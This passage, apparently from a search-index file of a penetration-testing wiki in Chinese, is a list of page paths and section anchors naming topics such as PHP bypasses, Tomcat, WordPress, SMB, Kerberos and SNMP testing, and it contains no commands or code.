unctions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.html#通过-proc_open-和自定义环境利用绕过-php-safe_mode","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.html#php-perl-扩展-safe_mode-绕过漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.html#php-523---win32std-ext-保护绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.html#php-52---fopen-漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.html#通过内存","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.html#mod_cgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.html#php-4--420-php-5-pcntl_exec","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#php---rce-利用对象创建-new-_get-a","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#介绍","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#rce-通过自定义类或自动加载","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#通过内置类实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#ssrf--phar-deserialization","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#利用-pdos","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#soapclientsimplexmlelement-xxe","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#通过-imagick-extension-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#vid-解析器","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#php-crash--brute-force","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#format-string-in-class-name-resolution-php-700-bug-71105","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#references","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#php-ssrf","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#ssrf-php-函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#wordpress-ssrf通过dns重绑定","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#crlf","network-services-pentesting/pentesting-web/prestashop.html#prestashop","network-services-pentesting/pentesting-web/prestashop.html#从-xss-到-rce","network-services-pentesting/pentesting-web/python.html#python","network-services-pentesting/pentesting-web/python.html#使用-python-的服务器","network-services-pentesting/pentesting-web/python.html#tricks","network-services-pentesting/pentesting-web/rocket-chat.html#rocket-chat","network-services-pentesting/pentesting-web/rocket-chat.html#rce","network-services-pentesting/pentesting-web/ruby-tricks.html#ruby-tricks","network-services-pentesting/pentesting-web/ruby-tricks.html#file-upload-to-rce","network-services-pentesting/pentesting-web/ruby-tricks.html#active-storage-image-transformation--command-execution-cve-2025-24293","network-services-pentesting/pentesting-web/ruby-tricks.html#rackstatic-lfi--path-traversal-cve-2025-27610","network-services-pentesting/pentesting-web/ruby-tricks.html#forgingdecrypting-rails-cookies-when-secret_key_base-is-leaked","network-services-pentesting/pentesting-web/ruby-tricks.html#另请参阅rubyrails-特定漏洞","network-services-pentesting/pentesting-web/ruby-tricks.html#参考资料","network-services-pentesting/pentesting-web/code-review-tools.html#源代码审查--sast-工具","network-services-pentesting/pentesting-web/code-review-tools.html#指导和工具列表","network-services-pentesting/pentesting-web/code-review-tools.html#多语言工具","network-services-pentesting/pentesting-web/code-review-tools.html#naxus---ai-gents","network-services-pentesting/pentesting-web/code-review-tools.html#semgrep","network-services-pentesting/pentesting-web/code-review-tools.html#sonarqube","network-services-pentesting/pentesting-web/code-review-tools.html#codeql","network-services-pentesting/pentesting-web/code-review-tools.html#snyk","network-services-pentesting/pentesting-web/code-review-tools.html#insider","network-services-pentesting/pentesting-web/code-review-tools.html#deepsource","network-services-pentesting/pentesting-web/code-review-tools.html#nodejs","network-services-pentesting/pentesting-web/code-review-tools.html#electron","network-services-pentesting/pentesting-web/code-review-tools.html#python","network-services-pentesting/pentesting-web/code-review-tools.html#net","network-services-pentesting/pentesting-web/code-review-tools.html#rust","network-services-pentesting/pentesting-web/code-review-tools.html#java","network-services-pentesting/pentesting-web/code-review-tools.html#go","network-services-pentesting/pentesting-web/code-review-tools.html#php","network-services-pentesting/pentesting-web/code-review-tools.html#wordpress-插件","network-services-pentesting/pentesting-web/code-review-tools.html#solidity","network-services-pentesting/pentesting-web/code-review-tools.html#javascript","network-services-pentesting/pentesting-web/code-review-tools.html#发现","network-services-pentesting/pentesting-web/code-review-tools.html#静态分析","network-services-pentesting/pentesting-web/special-http-headers.html#特殊-http-头","network-services-pentesting/pentesting-web/special-http-headers.html#字典--工具","network-services-pentesting/pentesting-web/special-http-headers.html#用于修改来源位置的-headers","network-services-pentesting/pentesting-web/special-http-headers.html#hop-by-hop-headers","network-services-pentesting/pentesting-web/special-http-headers.html#http-request-smuggling","network-services-pentesting/pentesting-web/special-http-headers.html#the-expect-header","network-services-pentesting/pentesting-web/special-http-headers.html#缓存相关-headers","network-services-pentesting/pentesting-web/special-http-headers.html#条件请求","network-services-pentesting/pentesting-web/special-http-headers.html#range-请求","network-services-pentesting/pentesting-web/special-http-headers.html#消息体信息","network-services-pentesting/pentesting-web/special-http-headers.html#服务器信息","network-services-pentesting/pentesting-web/special-http-headers.html#控制相关","network-services-pentesting/pentesting-web/special-http-headers.html#下载","network-services-pentesting/pentesting-web/special-http-headers.html#安全标头","network-services-pentesting/pentesting-web/special-http-headers.html#内容安全策略-csp","network-services-pentesting/pentesting-web/special-http-headers.html#trusted-types","network-services-pentesting/pentesting-web/special-http-headers.html#x-content-type-options","network-services-pentesting/pentesting-web/special-http-headers.html#x-frame-options","network-services-pentesting/pentesting-web/special-http-headers.html#跨源资源策略-corp-和-跨源资源共享-cors","network-services-pentesting/pentesting-web/special-http-headers.html#跨源嵌入策略-coep-和-跨源打开策略-coop","network-services-pentesting/pentesting-web/special-http-headers.html#http-strict-transport-security-hsts","network-services-pentesting/pentesting-web/special-http-headers.html#header-name-casing-bypass","network-services-pentesting/pentesting-web/special-http-headers.html#利用该绕过","network-services-pentesting/pentesting-web/special-http-headers.html#示例apache-camel-exec-rce-cve-2025-27636","network-services-pentesting/pentesting-web/special-http-headers.html#检测与缓解","network-services-pentesting/pentesting-web/special-http-headers.html#references","network-services-pentesting/pentesting-web/spring-actuators.html#spring-actuators","network-services-pentesting/pentesting-web/spring-actuators.html#spring-auth-bypass","network-services-pentesting/pentesting-web/spring-actuators.html#exploiting-spring-boot-actuators","network-services-pentesting/pentesting-web/spring-actuators.html#要点","network-services-pentesting/pentesting-web/spring-actuators.html#利用技术","network-services-pentesting/pentesting-web/spring-actuators.html#附加信息","network-services-pentesting/pentesting-web/spring-actuators.html#相关主题","network-services-pentesting/pentesting-web/spring-actuators.html#heapdump-secrets-mining-credentials-tokens-internal-urls","network-services-pentesting/pentesting-web/spring-actuators.html#abusing-actuator-loggerslogging-to-capture-credentials","network-services-pentesting/pentesting-web/spring-actuators.html#references","network-services-pentesting/pentesting-web/symphony.html#symfony","network-services-pentesting/pentesting-web/symphony.html#recon--enumeration","network-services-pentesting/pentesting-web/symphony.html#finger-printing","network-services-pentesting/pentesting-web/symphony.html#interesting-files--endpoints","network-services-pentesting/pentesting-web/symphony.html#high-impact-vulnerabilities-2023-2025","network-services-pentesting/pentesting-web/symphony.html#1-app_secret-disclosure--rce-via-_fragment-aka-secret-fragment","network-services-pentesting/pentesting-web/symphony.html#2-windows-process-hijack--cve-2024-51736","network-services-pentesting/pentesting-web/symphony.html#3-session-fixation--cve-2023-46733","network-services-pentesting/pentesting-web/symphony.html#4-twig-sandbox-xss--cve-2023-46734","network-services-pentesting/pentesting-web/symphony.html#5-symfony-1-gadget-chains-仍在遗留应用中发现","network-services-pentesting/pentesting-web/symphony.html#exploitation-cheat-sheet","network-services-pentesting/pentesting-web/symphony.html#calculate-hmac-token-for-_fragment","network-services-pentesting/pentesting-web/symphony.html#暴力破解弱-app_secret","network-services-pentesting/pentesting-web/symphony.html#通过暴露的-symfony-console-进行-rce","network-services-pentesting/pentesting-web/symphony.html#防御性注意事项","network-services-pentesting/pentesting-web/symphony.html#有用的攻击工具","network-services-pentesting/pentesting-web/symphony.html#参考","network-services-pentesting/pentesting-web/tomcat/index.html#tomcat","network-services-pentesting/pentesting-web/tomcat/index.html#discovery","network-services-pentesting/pentesting-web/tomcat/index.html#enumeration","network-services-pentesting/pentesting-web/tomcat/index.html#版本识别","network-services-pentesting/pentesting-web/tomcat/index.html#管理文件位置","network-services-pentesting/pentesting-web/tomcat/index.html#用户名枚举","network-services-pentesting/pentesting-web/tomcat/index.html#默认凭据","network-services-pentesting/pentesting-web/tomcat/index.html#暴力攻击","network-services-pentesting/pentesting-web/tomcat/index.html#common-vulnerabilities","network-services-pentesting/pentesting-web/tomcat/index.html#密码回溯泄露","network-services-pentesting/pentesting-web/tomcat/index.html#双重-url-编码","network-services-pentesting/pentesting-web/tomcat/index.html#examples","network-services-pentesting/pentesting-web/tomcat/index.html#路径遍历漏洞","network-services-pentesting/pentesting-web/tomcat/index.html#rce","network-services-pentesting/pentesting-web/tomcat/index.html#限制","network-services-pentesting/pentesting-web/tomcat/index.html#metasploit","network-services-pentesting/pentesting-web/tomcat/index.html#msfvenom-反向-shell","network-services-pentesting/pentesting-web/tomcat/index.html#使用--tomcatwardeployerpy--进行绑定和反向-shell","network-services-pentesting/pentesting-web/tomcat/index.html#使用--culsterd","network-services-pentesting/pentesting-web/tomcat/index.html#手动方法---web-shell","network-services-pentesting/pentesting-web/tomcat/index.html#手动方法-2","network-services-pentesting/pentesting-web/tomcat/index.html#post","network-services-pentesting/pentesting-web/tomcat/index.html#其他-tomcat-扫描工具","network-services-pentesting/pentesting-web/tomcat/index.html#参考文献","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#uncovering-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#common-techniques-to-uncover-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#tools-to-uncover-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#从云基础设施中揭示cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#通过-cloudflare-绕过-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#认证源拉取","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#允许列表-cloudflare-ip-地址","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#绕过-cloudflare-进行抓取","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#缓存","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#工具","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#cloudflare-解算器","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#加固的无头浏览器","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#带有-cloudflare-内置绕过的智能代理","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#逆向工程-cloudflare-反机器人保护","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#参考文献","network-services-pentesting/pentesting-web/vuejs.html#vuejs","network-services-pentesting/pentesting-web/vuejs.html#vuejs中的xss漏洞","network-services-pentesting/pentesting-web/vuejs.html#v-html指令","network-services-pentesting/pentesting-web/vuejs.html#v-bind-with-src-or-href","network-services-pentesting/pentesting-web/vuejs.html#v-on-与用户控制的处理程序","network-services-pentesting/pentesting-web/vuejs.html#动态属性--事件名称","network-services-pentesting/pentesting-web/vuejs.html#动态组件-","network-services-pentesting/pentesting-web/vuejs.html#不可信的模板在ssr中","network-services-pentesting/pentesting-web/vuejs.html#过滤器--渲染函数的-eval","network-services-pentesting/pentesting-web/vuejs.html#vue项目中的其他常见漏洞","network-services-pentesting/pentesting-web/vuejs.html#插件中的原型污染","network-services-pentesting/pentesting-web/vuejs.html#使用-vue-router-的开放重定向","network-services-pentesting/pentesting-web/vuejs.html#csrf-in-axios--fetch","network-services-pentesting/pentesting-web/vuejs.html#click-jacking","network-services-pentesting/pentesting-web/vuejs.html#content-security-policy-pitfalls","network-services-pentesting/pentesting-web/vuejs.html#供应链攻击-node-ipc--2022年3月","network-services-pentesting/pentesting-web/vuejs.html#加固检查清单","network-services-pentesting/pentesting-web/vuejs.html#参考资料","network-services-pentesting/pentesting-web/vmware-esx-vcenter....html#枚举","network-services-pentesting/pentesting-web/vmware-esx-vcenter....html#暴力破解","network-services-pentesting/pentesting-web/web-api-pentesting.html#web-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#api-pentesting-methodology-summary","network-services-pentesting/pentesting-web/web-api-pentesting.html#understanding-api-types","network-services-pentesting/pentesting-web/web-api-pentesting.html#practice-labs","network-services-pentesting/pentesting-web/web-api-pentesting.html#effective-tricks-for-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#tools-and-resources-for-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#学习和实践资源","network-services-pentesting/pentesting-web/web-api-pentesting.html#参考","network-services-pentesting/pentesting-web/put-method-webdav.html#webdav","network-services-pentesting/pentesting-web/put-method-webdav.html#davtest","network-services-pentesting/pentesting-web/put-method-webdav.html#cadaver","network-services-pentesting/pentesting-web/put-method-webdav.html#put-请求","network-services-pentesting/pentesting-web/put-method-webdav.html#move-请求","network-services-pentesting/pentesting-web/put-method-webdav.html#iis56-webdav-漏洞","network-services-pentesting/pentesting-web/put-method-webdav.html#后凭证","network-services-pentesting/pentesting-web/put-method-webdav.html#参考","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug--flask-debug","network-services-pentesting/pentesting-web/werkzeug.html#console-rce","network-services-pentesting/pentesting-web/werkzeug.html#pin-保护---路径遍历","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-控制台-pin-漏洞","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-unicode-字符","network-services-pentesting/pentesting-web/werkzeug.html#自动化利用","network-services-pentesting/pentesting-web/werkzeug.html#参考文献","network-services-pentesting/pentesting-web/wordpress.html#wordpress","network-services-pentesting/pentesting-web/wordpress.html#基本信息","network-services-pentesting/pentesting-web/wordpress.html#主要的-wordpress-文件","network-services-pentesting/pentesting-web/wordpress.html#用户权限","network-services-pentesting/pentesting-web/wordpress.html#被动枚举","network-services-pentesting/pentesting-web/wordpress.html#获取-wordpress-版本","network-services-pentesting/pentesting-web/wordpress.html#获取插件","network-services-pentesting/pentesting-web/wordpress.html#获取主题","network-services-pentesting/pentesting-web/wordpress.html#通用提取版本","network-services-pentesting/pentesting-web/wordpress.html#主动枚举","network-services-pentesting/pentesting-web/wordpress.html#plugins-and-themes","network-services-pentesting/pentesting-web/wordpress.html#用户","network-services-pentesting/pentesting-web/wordpress.html#xml-rpc","network-services-pentesting/pentesting-web/wordpress.html#wp-cronphp-dos","network-services-pentesting/pentesting-web/wordpress.html#wp-jsonoembed10proxy---ssrf","network-services-pentesting/pentesting-web/wordpress.html#ssrf","network-services-pentesting/pentesting-web/wordpress.html#自动化工具","network-services-pentesting/pentesting-web/wordpress.html#通过覆盖一位获得访问","network-services-pentesting/pentesting-web/wordpress.html#面板-rce","network-services-pentesting/pentesting-web/wordpress.html#msf","network-services-pentesting/pentesting-web/wordpress.html#插件-rce","network-services-pentesting/pentesting-web/wordpress.html#php-插件","network-services-pentesting/pentesting-web/wordpress.html#uploading-and-activating-malicious-plugin","network-services-pentesting/pentesting-web/wordpress.html#从-xss-到-rce","network-services-pentesting/pentesting-web/wordpress.html#后利用","network-services-pentesting/pentesting-web/wordpress.html#wordpress-plugins-pentest","network-services-pentesting/pentesting-web/wordpress.html#attack-surface","network-services-pentesting/pentesting-web/wordpress.html#trusted-header-rest-impersonation-woocommerce-payments--561","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-arbitrary-file-deletion-via-wp_ajax_nopriv-litho-theme--30","network-services-pentesting/pentesting-web/wordpress.html#privilege-escalation-via-stale-role-restoration-and-missing-authorization-ase-view-admin-as-role","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-privilege-escalation-via-cookietrusted-user-switching-on-public-init-service-finder-sf-booking","network-services-pentesting/pentesting-web/wordpress.html#waf-considerations-for-wordpressplugin-cves","network-services-pentesting/pentesting-web/wordpress.html#wordpress-protection","network-services-pentesting/pentesting-web/wordpress.html#regular-updates","network-services-pentesting/pentesting-web/wordpress.html#安全插件","network-services-pentesting/pentesting-web/wordpress.html#其他建议","network-services-pentesting/pentesting-web/wordpress.html#未认证的-sql-injection由于验证不足wp-job-portal--232","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-arbitrary-file-download--path-traversal-wp-job-portal--232","network-services-pentesting/pentesting-web/wordpress.html#参考资料","network-services-pentesting/pentesting-kerberos-88/index.html#88tcpudp---pentesting-kerberos","network-services-pentesting/pentesting-kerberos-88/index.html#基本信息","network-services-pentesting/pentesting-kerberos-88/index.html#要学习如何滥用-kerberos您应该阅读关于----active-directory---的帖子","network-services-pentesting/pentesting-kerberos-88/index.html#更多","network-services-pentesting/pentesting-kerberos-88/index.html#shodan","network-services-pentesting/pentesting-kerberos-88/index.html#ms14-068","network-services-pentesting/pentesting-kerberos-88/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#从windows中提取票证","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#mimikatz","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#rubeus","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#参考","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#linux中的凭证存储","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#提取凭证","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#参考文献","network-services-pentesting/pentesting-web/wsgi.html#wsgi-后渗透技巧","network-services-pentesting/pentesting-web/wsgi.html#wsgi-概述","network-services-pentesting/pentesting-web/wsgi.html#uwsgi-magic-variables-利用","network-services-pentesting/pentesting-web/wsgi.html#关键可利用变量","network-services-pentesting/pentesting-web/wsgi.html#ssrf--gopher-to","network-services-pentesting/pentesting-web/wsgi.html#攻击向量","network-services-pentesting/pentesting-web/wsgi.html#利用示例","network-services-pentesting/pentesting-web/wsgi.html#uwsgi-协议结构","network-services-pentesting/pentesting-web/wsgi.html#post-exploitation-techniques","network-services-pentesting/pentesting-web/wsgi.html#1-persistent-backdoors","network-services-pentesting/pentesting-web/wsgi.html#2-信息泄露","network-services-pentesting/pentesting-web/wsgi.html#3-privilege-escalation","network-services-pentesting/pentesting-web/wsgi.html#参考资料","network-services-pentesting/pentesting-pop.html#110995---pentesting-pop","network-services-pentesting/pentesting-pop.html#基本信息","network-services-pentesting/pentesting-pop.html#枚举","network-services-pentesting/pentesting-pop.html#横幅抓取","network-services-pentesting/pentesting-pop.html#手动","network-services-pentesting/pentesting-pop.html#自动化","network-services-pentesting/pentesting-pop.html#pop3-暴力破解","network-services-pentesting/pentesting-pop.html#pop-语法","network-services-pentesting/pentesting-pop.html#记录密码","network-services-pentesting/pentesting-pop.html#hacktricks-自动命令","network-services-pentesting/pentesting-rpcbind.html#111tcpudp---pentesting-portmapper","network-services-pentesting/pentesting-rpcbind.html#基本信息","network-services-pentesting/pentesting-rpcbind.html#枚举","network-services-pentesting/pentesting-rpcbind.html#shodan","network-services-pentesting/pentesting-rpcbind.html#rpcbind--nfs","network-services-pentesting/pentesting-rpcbind.html#nis","network-services-pentesting/pentesting-rpcbind.html#nif-文件","network-services-pentesting/pentesting-rpcbind.html#rpc-用户","network-services-pentesting/pentesting-rpcbind.html#绕过过滤的-portmapper-端口","network-services-pentesting/pentesting-rpcbind.html#shodan-1","network-services-pentesting/pentesting-rpcbind.html#实践实验室","network-services-pentesting/pentesting-rpcbind.html#hacktricks-自动命令","network-services-pentesting/113-pentesting-ident.html#113---pentesting-ident","network-services-pentesting/113-pentesting-ident.html#基本信息","network-services-pentesting/113-pentesting-ident.html#枚举","network-services-pentesting/113-pentesting-ident.html#手动---获取用户识别服务","network-services-pentesting/113-pentesting-ident.html#nmap","network-services-pentesting/113-pentesting-ident.html#ident-user-enum","network-services-pentesting/113-pentesting-ident.html#shodan","network-services-pentesting/113-pentesting-ident.html#文件","network-services-pentesting/113-pentesting-ident.html#hacktricks-自动命令","network-services-pentesting/pentesting-ntp.html#123udp---pentesting-ntp","network-services-pentesting/pentesting-ntp.html#基本信息","network-services-pentesting/pentesting-ntp.html#摘要与安全提示","network-services-pentesting/pentesting-ntp.html#枚举","network-services-pentesting/pentesting-ntp.html#经典-ntpd--ntpq--ntpdc","network-services-pentesting/pentesting-ntp.html#chrony--chronyc-在大多数现代linux发行版中","network-services-pentesting/pentesting-ntp.html#nmap","network-services-pentesting/pentesting-ntp.html#大规模互联网扫描","network-services-pentesting/pentesting-ntp.html#检查配置文件","network-services-pentesting/pentesting-ntp.html#最近的漏洞-2023-2025","network-services-pentesting/pentesting-ntp.html#高级攻击","network-services-pentesting/pentesting-ntp.html#1-ntp-放大--反射","network-services-pentesting/pentesting-ntp.html#2-时间偏移--延迟攻击-khronos--chronos-研究","network-services-pentesting/pentesting-ntp.html#3-nts-滥用与-4460tcp-暴露","network-services-pentesting/pentesting-ntp.html#加固--最佳当前实践-bcp-233--rfc-8633","network-services-pentesting/pentesting-ntp.html#shodan--censys-dorks","network-services-pentesting/pentesting-ntp.html#有用的工具","network-services-pentesting/pentesting-ntp.html#hacktricks-自动命令","network-services-pentesting/pentesting-ntp.html#参考文献","network-services-pentesting/135-pentesting-msrpc.html#135-593---pentesting-msrpc","network-services-pentesting/135-pentesting-msrpc.html#基本信息","network-services-pentesting/135-pentesting-msrpc.html#msrpc是如何工作的","network-services-pentesting/135-pentesting-msrpc.html#识别暴露的rpc服务","network-services-pentesting/135-pentesting-msrpc.html#识别-ip-地址","network-services-pentesting/135-pentesting-msrpc.html#使用有效凭据执行-rce","network-services-pentesting/135-pentesting-msrpc.html#端口-593","network-services-pentesting/135-pentesting-msrpc.html#msrpc-接口的自动模糊测试","network-services-pentesting/135-pentesting-msrpc.html#1-清点接口","network-services-pentesting/135-pentesting-msrpc.html#2-运行模糊测试器","network-services-pentesting/135-pentesting-msrpc.html#3-使用-neo4j-可视化","network-services-pentesting/135-pentesting-msrpc.html#自动化接口枚举与动态客户端生成-ntobjectmanager","network-services-pentesting/135-pentesting-msrpc.html#上下文感知的-rpc-模糊测试-ms-rpc-fuzzer","network-services-pentesting/135-pentesting-msrpc.html#参考文献","network-services-pentesting/137-138-139-pentesting-netbios.html#137138139---pentesting-netbios","network-services-pentesting/137-138-139-pentesting-netbios.html#netbios-名称服务","network-services-pentesting/137-138-139-pentesting-netbios.html#名称服务","network-services-pentesting/137-138-139-pentesting-netbios.html#数据报分发服务","network-services-pentesting/137-138-139-pentesting-netbios.html#session-service","network-services-pentesting/137-138-139-pentesting-netbios.html#hacktricks-自动命令","network-services-pentesting/pentesting-smb/index.html#139445---pentesting-smb","network-services-pentesting/pentesting-smb/index.html#端口-139","network-services-pentesting/pentesting-smb/index.html#port-445","network-services-pentesting/pentesting-smb/index.html#smb","network-services-pentesting/pentesting-smb/index.html#ipc-共享","network-services-pentesting/pentesting-smb/index.html#什么是-ntlm","network-services-pentesting/pentesting-smb/index.html#服务器枚举","network-services-pentesting/pentesting-smb/index.html#扫描--网络以搜索主机","network-services-pentesting/pentesting-smb/index.html#smb-服务器版本","network-services-pentesting/pentesting-smb/index.html#搜索-exploit","network-services-pentesting/pentesting-smb/index.html#可能的--凭据","network-services-pentesting/pentesting-smb/index.html#brute-force","network-services-pentesting/pentesting-smb/index.html#smb-环境信息","network-services-pentesting/pentesting-smb/index.html#获取信息","network-services-pentesting/pentesting-smb/index.html#枚举用户组和已登录用户","network-services-pentesting/pentesting-smb/index.html#枚举本地用户","network-services-pentesting/pentesting-smb/index.html#metasploit---枚举本地用户","network-services-pentesting/pentesting-smb/index.html#枚举-lsarpc-和-samr-rpcclient","network-services-pentesting/pentesting-smb/index.html#gui-connection-from-linux","network-services-pentesting/pentesting-smb/index.html#共享文件夹枚举","network-services-pentesting/pentesting-smb/index.html#列出共享文件夹","network-services-pentesting/pentesting-smb/index.html#连接列出-共享文件夹","network-services-pentesting/pentesting-smb/index.html#手动枚举-windows-共享并连接到它们","network-services-pentesting/pentesting-smb/index.html#从-windows-枚举共享--无需第三方工具","network-services-pentesting/pentesting-smb/index.html#挂载共享文件夹","network-services-pentesting/pentesting-smb/index.html#下载文件","network-services-pentesting/pentesting-smb/index.html#域共享文件夹搜索","network-services-pentesting/pentesting-smb/index.html#读取注册表","network-services-pentesting/pentesting-smb/index.html#后渗透","network-services-pentesting/pentesting-smb/index.html#使用-kerberos-进行认证","network-services-pentesting/pentesting-smb/index.html#执行命令","network-services-pentesting/pentesting-smb/index.html#crackmapexec","network-services-pentesting/pentesting-smb/index.html#psexec------smbexec","network-services-pentesting/pentesting-smb/index.html#wmiexec-dcomexec","network-services-pentesting/pentesting-smb/index.html#atexec","network-services-pentesting/pentesting-smb/index.html#impacket-参考","network-services-pentesting/pentesting-smb/index.html#ksmbd-攻击面-和-smb2smb3-协议-fuzzing-syzkaller","network-services-pentesting/pentesting-smb/index.html#bruteforce-用户凭证","network-services-pentesting/pentesting-smb/index.html#smb-relay-attack","network-services-pentesting/pentesting-smb/index.html#smb-trap","network-services-pentesting/pentesting-smb/index.html#smbtrap-using-mitmf","network-services-pentesting/pentesting-smb/index.html#ntlm-theft","network-services-pentesting/pentesting-smb/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-smb/index.html#参考资料","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#ksmbd-attack-surface--smb2smb3-protocol-fuzzing-syzkaller","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#overview","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#expand-ksmbd-attack-surface-via-configuration","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#authentication-and-rate-limiting-adjustments-for-fuzzing","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#stateful-harness-extract-resources-and-chain-requests","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#基于语法的-smb2-生成-有效的-pdus","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#directed-fuzzing-with-focus_areas","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#用-anyblob-打破覆盖率停滞","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#sanitizers-超越-kasan","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#吞吐量与并行性说明","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#实用清单","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#参考资料","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#rpcclient-enumeration","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#相对标识符-rid-和安全标识符-sid-概述","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#使用-rpcclient-进行枚举","network-services-pentesting/pentesting-imap.html#143993---pentesting-imap","network-services-pentesting/pentesting-imap.html#internet-message-access-protocol","network-services-pentesting/pentesting-imap.html#横幅抓取","network-services-pentesting/pentesting-imap.html#ntlm-auth---信息泄露","network-services-pentesting/pentesting-imap.html#imap暴力破解","network-services-pentesting/pentesting-imap.html#语法","network-services-pentesting/pentesting-imap.html#演变","network-services-pentesting/pentesting-imap.html#curl","network-services-pentesting/pentesting-imap.html#shodan","network-services-pentesting/pentesting-imap.html#hacktricks-自动命令","network-services-pentesting/pentesting-snmp/index.html#1611621016110162udp---pentesting-snmp","network-services-pentesting/pentesting-snmp/index.html#基本信息","network-services-pentesting/pentesting-snmp/index.html#mib","network-services-pentesting/pentesting-snmp/index.html#oids","network-services-pentesting/pentesting-snmp/index.html#oid-示例","network-services-pentesting/pentesting-snmp/index.html#snmp-版本","network-services-pentesting/pentesting-snmp/index.html#社区字符串","network-services-pentesting/pentesting-snmp/index.html#端口","network-services-pentesting/pentesting-snmp/index.html#暴力破解社区字符串-v1-和-v2c","network-services-pentesting/pentesting-snmp/index.html#枚举-snmp","network-services-pentesting/pentesting-snmp/index.html#危险设置","network-services-pentesting/pentesting-snmp/index.html#访问设置","network-services-pentesting/pentesting-snmp/index.html#snmp-参数用于-microsoft-windows","network-services-pentesting/pentesting-snmp/index.html#ci